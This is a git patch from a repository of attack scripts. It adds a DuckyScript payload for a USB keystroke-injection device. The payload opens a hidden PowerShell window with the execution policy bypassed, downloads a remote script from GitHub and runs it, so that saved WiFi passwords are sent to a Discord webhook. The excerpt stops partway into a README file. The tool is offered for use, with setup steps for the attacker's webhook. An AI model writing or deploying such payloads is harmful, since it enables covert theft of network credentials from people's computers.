From 92cc2989f63c65ff599761d2a09e06047e5e28f4 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 29 Dec 2023 14:25:40 +0000 Subject: [PATCH] Add files via upload --- .../Discord-WiFi-Grabber.txt | 19 ++++++++++++ Wifi-Networks-to-Discord/README.md | 13 ++++++++ Wifi-Networks-to-Discord/main.ps1 | 31 +++++++++++++++++++ 3 files changed, 63 insertions(+) create mode 100644 Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt create mode 100644 Wifi-Networks-to-Discord/README.md create mode 100644 Wifi-Networks-to-Discord/main.ps1 diff --git a/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt b/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt new file mode 100644 index 0000000..96e1644 --- /dev/null +++ b/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt @@ -0,0 +1,19 @@ +REM Title: beigeworm's saved WiFi to Discord Webhook. +REM Author: @beigeworm +REM Description: This script collects saved WiFi info and posts results to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DC-WiFi-Grab.ps1 | iex +ENTER + + diff --git a/Wifi-Networks-to-Discord/README.md b/Wifi-Networks-to-Discord/README.md new file mode 100644 index 0000000..703fa1c --- /dev/null +++ b/Wifi-Networks-to-Discord/README.md @@ -0,0 +1,13 @@ + +